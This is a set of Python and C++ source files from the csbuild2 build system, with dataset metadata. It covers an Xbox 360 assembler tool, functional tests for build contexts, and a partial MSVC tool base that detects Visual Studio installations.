"SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: xbox_360_assembler\n\t:synopsis: Xbox 360 assembler tool\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom .assembler_base import AssemblerBase\nfrom ..common.tool_traits import HasDebugLevel\nfrom ..common.xbox_360_tool_base import Xbox360BaseTool\n\nDebugLevel = HasDebugLevel.DebugLevel\n\nclass Xbox360Assembler(Xbox360BaseTool, AssemblerBase):\n\t\"\"\"\n\tXbox 360 assembler implementation.\n\t\"\"\"\n\tsupportedPlatforms = {\"Windows\"}\n\tsupportedArchitectures = {\"xcpu\"}\n\tinputFiles={\".asm\"}\n\toutputFiles = {\".obj\"}\n\n\tdef __init__(self, projectSettings):\n\t\tXbox360BaseTool.__init__(self, projectSettings)\n\t\tAssemblerBase.__init__(self, projectSettings)\n\n\t\tself._exePath = None\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\toutputPath = os.path.join(project.GetIntermediateDirectory(inputFile), os.path.splitext(os.path.basename(inputFile.filename))[0])\n\n\t\treturn tuple({ \"{}.obj\".format(outputPath) })\n\n\tdef _getCommand(self, project, inputFile):\n\t\tcmd = [self._exePath] \\\n\t\t\t+ self._getDefaultArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._asmFlags \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ [inputFile.filename]\n\n\t\treturn [arg for arg in cmd if arg]\n\n\tdef SetupForProject(self, project):\n\t\tXbox360BaseTool.SetupForProject(self, project)\n\t\tAssemblerBase.SetupForProject(self, project)\n\n\t\tself._exePath = os.path.join(self._xbox360BinPath, \"ml.exe\")\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getDefaultArgs(self):\n\t\targs = [\"/nologo\", \"/c\"]\n\t\treturn args\n\n\tdef _getDebugArgs(self):\n\t\targs = [] if self._debugLevel == DebugLevel.Disabled else [\"/Zi\", \"/Zd\"]\n\t\treturn args\n\n\tdef _getPreprocessorArgs(self):\n\t\tdefineArgs = [\"/D{}\".format(d) for d in self._defines]\n\t\treturn defineArgs\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = [\"/I{}\".format(directory) for directory in self._includeDirectories]\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"/Fo\", outputFiles[0]]\n" }, { "alpha_fraction": 0.7368895411491394, "alphanum_fraction": 0.7538295388221741, "avg_line_length": 55.6224479675293, "blob_id": "7601f1477383314c2c455927f8fd62dfff1e8888", "content_id": "77a73a2de1a5724300d39462c2e3dd32fed03453", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5549, "license_type": "no_license", "max_line_length": 109, "num_lines": 98, "path": "/functional_tests/multi_context_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test for MultiContexts\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\n\nclass MultiContextTest(FunctionalTest):\n\t\"\"\"Multi context test\"\"\"\n\t# pylint: disable=invalid-name\n\tdef runTest(self, projectName):\n\t\t\"\"\"Multi context test\"\"\"\n\t\tself.assertMakeSucceeds(\"--ao\", \"--aa\", \"--at\", \"--project\", projectName)\n\n\t\tfor i in range(1, 11):\n\t\t\t# debug/foo - both create this output scheme\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/foo/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/foo/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/foo/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/foo/AddDoubles4/{}.second\".format(i), str(i*2))\n\n\t\t\t# debug/bar - debug creates this output scheme\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/bar/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/bar/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/bar/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/debug/bar/AddDoubles4/{}.second\".format(i), str(i*2))\n\n\t\t\t# release/foo - foo creates this output scheme\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/foo/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/foo/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/foo/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/foo/AddDoubles4/{}.second\".format(i), str(i*2))\n\n\t\t\t# release/bar - FirstThree toolchain group creates this output scheme, fourth toolchain will be default\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/bar/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/bar/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/release/bar/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/{}.second\".format(i), str(i*2))\n\n\t\t#debug/foo - foo forces fooFoo.third output name, LastThree toolchain group creates output directory scheme\n\t\tself.assertFileContents(\"./out/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/foo/AddDoubles2/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/foo/AddDoubles3/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/foo/AddDoubles4/fooFoo.third\", \"110\")\n\n\t\t#debug/bar - AddDoubles forces barFoo.third output name, bar creates output directory scheme\n\t\tself.assertFileContents(\"./out/LastThree/debug/bar/AddDoubles/barFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/bar/AddDoubles2/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/bar/AddDoubles3/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/debug/bar/AddDoubles4/Foo.third\", \"110\")\n\n\t\t#release/foo - release creates output directory scheme, foo forces fooFoo.third output name\n\t\tself.assertFileContents(\"./out/LastThree/release/foo/AddDoubles/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/foo/AddDoubles2/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/foo/AddDoubles3/fooFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/foo/AddDoubles4/fooFoo.third\", \"110\")\n\n\t\t#release/bar - release creates output directory scheme, AddDoubles forces barFoo.third output name\n\t\tself.assertFileContents(\"./out/LastThree/release/bar/AddDoubles/barFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/bar/AddDoubles2/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/bar/AddDoubles3/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/release/bar/AddDoubles4/Foo.third\", \"110\")\n\n\t\tself.cleanArgs = [\"--ao\", \"--aa\", \"--at\"]\n\n\n\tdef testWithSyntax(self):\n\t\t\"\"\"Run the test using the 'with' syntax\"\"\"\n\t\tself.runTest(\"TestProject\")\n\n\n\tdef testChaining(self):\n\t\t\"\"\"Run the test using chained context managers\"\"\"\n\t\tself.runTest(\"TestProjectChained\")\n" }, { "alpha_fraction": 0.731670618057251, "alphanum_fraction": 0.7331756353378296, "avg_line_length": 30.425676345825195, "blob_id": "68e795052ec6ae2010b441e7b48355b00b29d059", "content_id": "4ffec1942efa3990f0099cae42c5e7fad89097df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4651, "license_type": "no_license", "max_line_length": 125, "num_lines": 148, "path": "/functional_tests/basic_tool_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool\nimport os\n\nfooSet = False\nbarSet = False\nquxSet = False\n\ncsbuild.SetIntermediateDirectory(\"intermediate\")\ncsbuild.SetOutputDirectory(\"out\")\n\nclass AddDoubles(Tool):\n\t\"\"\"\n\tSimple base class to test global toolchain contexts\n\t\"\"\"\n\tsupportedArchitectures=None\n\tdef __init__(self, projectSettings):\n\t\tassert \"foo\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!foo\".format(id(AddDoubles)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._foo = projectSettings.get(\"foo\", False)\n\n\t\tassert \"bar\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!bar\".format(id(AddDoubles)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._bar = projectSettings.get(\"bar\", False)\n\n\t\tTool.__init__(self, projectSettings)\n\n\t@staticmethod\n\tdef SetFoo():\n\t\t\"\"\"\n\t\tSet foo to true, yay testing.\n\t\t\"\"\"\n\t\tglobal fooSet\n\t\tassert fooSet is False\n\t\tfooSet = True\n\t\tcsbuild.currentPlan.SetValue(\"foo\", True) #pylint: disable=protected-access\n\n\t@staticmethod\n\tdef SetBar():\n\t\t\"\"\"\n\t\tSet bar to true, yay testing.\n\t\t\"\"\"\n\t\tglobal barSet\n\t\tassert barSet is False\n\t\tbarSet = True\n\t\tcsbuild.currentPlan.SetValue(\"bar\", True) #pylint: disable=protected-access\n\nclass Doubler(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens a file, doubles its contents numerically, and writes a new file.\n\t\"\"\"\n\tinputFiles = {\".first\"}\n\n\toutputFiles = {\".second\"}\n\n\tdef Run(self, inputProject, inputFile):\n\t\tassert self._foo is True\n\t\tassert self._bar is True\n\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\tvalue = int(f.read())\n\t\tvalue *= 2\n\t\toutFile = os.path.join(inputProject.intermediateDir, os.path.splitext(os.path.basename(inputFile.filename))[0] + \".second\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass Adder(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens multiple doubled files and adds their contents together numerically, outputting a final file.\n\t\"\"\"\n\tinputGroups = {\".second\"}\n\toutputFiles = {\".third\"}\n\n\tdef __init__(self, projectSettings):\n\t\tassert \"qux\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!qux\".format(id(Adder)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._qux = projectSettings.get(\"qux\", False)\n\n\t\tAddDoubles.__init__(self, projectSettings)\n\n\t@staticmethod\n\tdef SetQux():\n\t\t\"\"\"\n\t\tSet qux to true, yay testing.\n\t\t\"\"\"\n\t\tglobal quxSet\n\t\tassert quxSet is False\n\t\tquxSet = True\n\t\tcsbuild.currentPlan.SetValue(\"qux\", True) #pylint: disable=protected-access\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tassert self._foo is True\n\t\tassert self._bar is True\n\t\tassert self._qux is True\n\t\tvalue = 0\n\t\tfor inputFile in inputFiles:\n\t\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\t\tvalue += int(f.read())\n\t\toutFile = os.path.join(inputProject.outputDir, inputProject.outputName + \".third\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\ncsbuild.RegisterToolchain(\"AddDoubles\", \"\", Doubler)\ncsbuild.SetDefaultToolchain(\"AddDoubles\")\n\ncsbuild.SetFoo()\n\nwith csbuild.Project(\"TestProject\", \".\"):\n\twith csbuild.Toolchain(\"AddDoubles\"):\n\t\tcsbuild.AddTool(Adder)\n\t\tcsbuild.SetQux()\n\t\twith csbuild.Target(\"release\"):\n\t\t\tcsbuild.SetBar()\n\tcsbuild.SetOutput(\"Foo\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.6222222447395325, "alphanum_fraction": 0.6222222447395325, "avg_line_length": 13.88888931274414, "blob_id": "ed6db642702835c09c06e19c198954fc5a07d64d", "content_id": "aa6b4eda5100945119300e04f961367baaa1073d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 135, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/functional_tests/explicit_sources_test/project/source/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\n#include <stdio.h>\n\nextern int getnum();\nextern int getextranum();\n\nint main()\n{\n\tprintf(\"data = %d, %d\", getnum(), getextranum());\n}\n" }, { "alpha_fraction": 0.6996132731437683, "alphanum_fraction": 0.7145121693611145, "avg_line_length": 28.101476669311523, "blob_id": "87cda64bfd3e20c101ca85aa3c984b24ea43ceaf", "content_id": "747f02ac1595c5e321b350030590606f27efd588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15773, "license_type": "no_license", "max_line_length": 154, "num_lines": 542, "path": "/csbuild/tools/common/msvc_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_tool_base\n\t:synopsis: Abstract base class for msvc tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport json\nimport os\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom csbuild import log\nfrom ..._utils.decorators import MetaClass, TypeChecked\nfrom ..._utils import PlatformString\nfrom ...toolchain import Tool\nfrom ... import commands\n\n\ndef _ignore(_):\n\tpass\n\ndef _noLogOnRun(shared, msg):\n\t_ignore(shared)\n\t_ignore(msg)\n\n\nclass Vcvarsall(object):\n\t\"\"\"\n\tClass for maintaining data output by vcvarsall.bat.\n\n\t:param binPath: Path to the msvc binaries.\n\t:type binPath: str\n\n\t:param libPaths: List of paths to Windows SDK libraries.\n\t:type libPaths: list\n\n\t:param winSdkVersion: Selected Windows SDK version (can be None for versions of Visual Studio that do not support selecting the SDK to be built against).\n\t:type winSdkVersion: str\n\n\t:param env: Custom environment dictionary extracted from the vcvarsall.bat output.\n\t:type env: dict\n\t\"\"\"\n\n\tInstances = dict()\n\n\tdef __init__(self, binPath, libPaths, winSdkVersion, env):\n\t\tself.binPath = binPath\n\t\tself.libPaths = libPaths\n\t\tself.winSdkVersion = winSdkVersion\n\t\tself.env = env\n\n\n\t@staticmethod\n\tdef Create(fullEnvString):\n\t\t\"\"\"\n\t\tFactory function for creating a Vcvarsall instance from a string containing all environment variables to parse.\n\n\t\t:param fullEnvString: New-line separated string of all environment variables.\n\t\t:type fullEnvString: str\n\n\t\t:return: New Vcvarsall instance.\n\t\t:rtype: :class:`csbuild.tools.common.msvc_tool_base.Vcvarsall`\n\t\t\"\"\"\n\t\tenvLines = fullEnvString.splitlines()\n\n\t\tbinPath = \"\"\n\t\tlibPaths = []\n\t\twinSdkVersion = None\n\t\tenv = dict()\n\n\t\tfor line in envLines:\n\t\t\tline = PlatformString(line)\n\n\t\t\t# Skip empty lines.\n\t\t\tif not line:\n\t\t\t\tcontinue\n\n\t\t\tkeyValue = line.split(\"=\", 1)\n\t\t\tkey = PlatformString(keyValue[0])\n\t\t\tvalue = PlatformString(keyValue[1])\n\n\t\t\tenv[key] = value\n\t\t\tkeyLowered = key.lower()\n\n\t\t\tif keyLowered == \"path\":\n\t\t\t\t# Passing a custom environment to subprocess.Popen() does not always help in locating a command\n\t\t\t\t# to execute on Windows (seems to be a bug with CreateProcess()), so we still need to find the\n\t\t\t\t# path where the tools live.\n\t\t\t\tfor envPath in [path for path in value.split(\";\") if path]:\n\t\t\t\t\tif os.access(os.path.join(envPath, \"cl.exe\"), os.F_OK):\n\t\t\t\t\t\tbinPath = PlatformString(envPath)\n\t\t\t\t\t\tbreak\n\t\t\telif keyLowered == \"lib\":\n\t\t\t\t# Extract the SDK library directory paths.\n\t\t\t\tlibPaths = [PlatformString(path) for path in value.split(\";\") if path]\n\t\t\telif keyLowered == \"windowssdkversion\":\n\t\t\t\twinSdkVersion = value.strip(\"\\\\\")\n\t\t\telif keyLowered == \"windowssdklibversion\":\n\t\t\t\t# Windows SDK 8.1 doesn't show up in a user friendly way, so we attempt to manually detect it.\n\t\t\t\tif value == \"winv6.3\\\\\":\n\t\t\t\t\twinSdkVersion = \"8.1\"\n\n\t\t# No bin path means the environment is not valid.\n\t\tif not binPath:\n\t\t\treturn None\n\n\t\treturn Vcvarsall(binPath, libPaths, winSdkVersion, env)\n\n\nclass _ArchitectureInfo(object):\n\tdef __init__(self, currentArch, projectArch, vcvarsArch, winSdkVersion, universalApp):\n\t\tself.currentArch = currentArch\n\t\tself.projectArch = projectArch\n\t\tself.vcvarsArch = vcvarsArch\n\t\tself.winSdkVersion = winSdkVersion\n\t\tself.universalApp = universalApp\n\n\nclass _BaseInstallData(object):\n\tdef __init__(self, version, displayName, path):\n\t\tself.version = version\n\t\tself.displayName = displayName\n\t\tself.path = path\n\n\n\t@staticmethod\n\t@abstractmethod\n\tdef FindInstallations(): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tStatic function to find all available installations of Visual Studio.\n\n\t\t:rtype: list[:class:`csbuild.tools.common.msvc_tool_base._BaseInstallData`]\n\t\t\"\"\"\n\t\tpass\n\n\n\t@abstractmethod\n\tdef GetEnvironment(self, archInfo): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tRetrieve the Vcvarsall instance for the current install data using the supplied architecture info.\n\n\t\t:param archInfo: Architecture info.\n\t\t:type archInfo: :class:`csbuild.tools.common.msvc_tool_base._ArchitectureInfo`\n\n\t\t:rtype: :class:`csbuild.tools.common.msvc_tool_base.Vcvarsall`\n\t\t\"\"\"\n\t\tpass\n\n\nclass _InstallDataPost2017(_BaseInstallData):\n\tdef __init__(self, version, displayName, path):\n\t\t_BaseInstallData.__init__(self, version, displayName, path)\n\n\n\t@staticmethod\n\tdef FindInstallations():\n\t\tprogFilesX86Path = os.getenv(\"ProgramFiles(x86)\")\n\t\tassert progFilesX86Path, \"Failed to find the \\\"Program Files (x86)\\\" path\"\n\n\t\tvsWhereFilePath = os.path.join(progFilesX86Path, \"Microsoft Visual Studio\", \"Installer\", \"vswhere.exe\")\n\n\t\tif not os.access(vsWhereFilePath, os.F_OK):\n\t\t\t# The file doesn't exist, so Visual Studio 2017 (or newer) hasn't been installed.\n\t\t\treturn []\n\n\t\tcmd = [\n\t\t\tvsWhereFilePath,\n\t\t\t\"-format\", \"json\",\n\t\t\t\"-requires\", \"Microsoft.VisualStudio.Component.VC.Tools.x86.x64\",\n\t\t]\n\n\t\t# Launch vswhere.exe to output information about each supported install.\n\t\t_, output, _ = commands.Run(cmd, stdout=_noLogOnRun, stderr=_noLogOnRun)\n\n\t\t# Load the install data from json.\n\t\tfoundInstallations = json.loads(output)\n\n\t\tinstallDataMap = {}\n\t\tinstallDataList = []\n\n\t\t# Parse the install information.\n\t\tfor install in foundInstallations:\n\t\t\tversion = int(install[\"installationVersion\"].split(\".\")[0])\n\t\t\tdisplayName = install[\"displayName\"]\n\t\t\tpath = install[\"installationPath\"]\n\n\t\t\tif version not in installDataMap:\n\t\t\t\tinstallDataMap.update({ version: [] })\n\n\t\t\tinstallDataMap[version].append(_InstallDataPost2017(version, displayName, path))\n\n\t\t# Sort the versions by latest to oldest.\n\t\tsortedKeys = reversed(sorted(installDataMap.keys()))\n\n\t\tfor versionKey in sortedKeys:\n\t\t\tinstallsForVersion = installDataMap[versionKey]\n\t\t\tinstallDataList.extend(installsForVersion)\n\n\t\treturn installDataList\n\n\n\tdef GetEnvironment(self, archInfo):\n\t\ttoolsRootPath = os.path.join(self.path, \"Common7\", \"Tools\")\n\t\tbatchFilePath = os.path.join(toolsRootPath, \"VsDevCmd.bat\")\n\n\t\tcmd = [\n\t\t\tbatchFilePath,\n\t\t\t\"-no_logo\",\n\t\t\t\"-arch={}\".format(archInfo.projectArch),\n\t\t\t\"-host_arch={}\".format(archInfo.currentArch),\n\t\t\t\"-winsdk={}\".format(archInfo.winSdkVersion) if archInfo.winSdkVersion else \"\",\n\t\t\t\"-app_platform={}\".format(\"UWP\" if archInfo.universalApp else \"Desktop\"),\n\t\t\t\"&\",\n\t\t\t\"set\",\n\t\t]\n\n\t\t_, output, _ = commands.Run([x for x in cmd if x], stdout=_noLogOnRun, stderr=_noLogOnRun)\n\n\t\tassert not output.startswith(\"[ERROR\"), output.replace(\"\\r\", \"\").split(\"\\n\", 1)[0]\n\n\t\treturn Vcvarsall.Create(output)\n\n\nclass _InstallDataPre2017(_BaseInstallData):\n\tdef __init__(self, version, displayName, path):\n\t\t_BaseInstallData.__init__(self, version, displayName, path)\n\n\n\t@staticmethod\n\tdef FindInstallations():\n\t\tvsVersionMacros = [\n\t\t\t(\"14\", \"VS140COMNTOOLS\", \"Visual Studio 2015\"),\n\t\t\t(\"12\", \"VS120COMNTOOLS\", \"Visual Studio 2013\"),\n\t\t\t(\"11\", \"VS110COMNTOOLS\", \"Visual Studio 2012\"),\n\t\t\t(\"10\", \"VS100COMNTOOLS\", \"Visual Studio 2010\"),\n\t\t]\n\n\t\tinstallDataList = []\n\n\t\t# Check for each version listed.\n\t\tfor version, macro, displayName in vsVersionMacros:\n\t\t\tif macro in os.environ:\n\t\t\t\tpath = os.path.abspath(os.path.join(os.environ[macro], \"..\", \"..\"))\n\n\t\t\t\tinstallDataList.append(_InstallDataPre2017(version, displayName, path))\n\n\t\treturn installDataList\n\n\n\tdef GetEnvironment(self, archInfo):\n\t\tmsvcRootPath = os.path.join(self.path, \"VC\")\n\t\tbatchFilePath = os.path.join(msvcRootPath, \"vcvarsall.bat\")\n\t\tvcvarsArch = archInfo.vcvarsArch\n\t\tstoreArg = \"\"\n\t\twinSdkArg = \"\"\n\n\t\tif self.version == \"14\":\n\t\t\t# Only Visual Studio 2015 supports the specifying the Windows SDK version and the \"store\" argument.\n\t\t\twinSdkArg = archInfo.winSdkVersion or \"\"\n\n\t\t\tif archInfo.universalApp:\n\t\t\t\tstoreArg = \"store\"\n\n\t\telif self.version != \"12\":\n\t\t\t# Visual Studio versions prior to 2013 did not have x64-specific tools for x86 and arm.\n\t\t\tvcvarsArch = {\n\t\t\t\t\"amd64_x86\": \"x86\",\n\t\t\t\t\"amd64_arm\": \"arm\",\n\t\t\t}.get(vcvarsArch, vcvarsArch)\n\n\t\tcmd = [\n\t\t\tbatchFilePath,\n\t\t\tvcvarsArch,\n\t\t\twinSdkArg,\n\t\t\tstoreArg,\n\t\t\t\"&\",\n\t\t\t\"set\",\n\t\t]\n\n\t\t_, output, _ = commands.Run([x for x in cmd if x], stdout=_noLogOnRun, stderr=_noLogOnRun)\n\n\t\tassert not output.startswith(\"!ERROR!\"), output.replace(\"\\r\", \"\").split(\"\\n\", 1)[0]\n\n\t\treturn Vcvarsall.Create(output)\n\n\n@MetaClass(ABCMeta)\nclass MsvcToolBase(Tool):\n\t\"\"\"\n\tParent class for all msvc tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._vsVersion = projectSettings.get(\"vsVersion\", None)\n\t\tself._winSdkVersion = projectSettings.get(\"winSdkVersion\", None)\n\t\tself._msvcSubsystem = projectSettings.get(\"msvcSubsystem\", None)\n\t\tself._msvcSubsystemVersion = projectSettings.get(\"msvcSubsystemVersion\", None)\n\n\t\tself._vcvarsall = None\n\t\tself._selectedInstall = None\n\t\tself._allInstalls = []\n\t\tself._enableUwp = False\n\n\n\t@property\n\tdef vsVersion(self):\n\t\t\"\"\"\n\t\t:return: Returns the Visual Studio version number.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._vsVersion\n\n\n\t@property\n\tdef winSdkVersion(self):\n\t\t\"\"\"\n\t\t:return: Returns the Windows SDK version number.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._winSdkVersion\n\n\t@property\n\tdef msvcSubsystem(self):\n\t\t\"\"\"\n\t\t:return: Returns the MSVC linker subsystem argument.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._msvcSubsystem\n\n\n\t@property\n\tdef 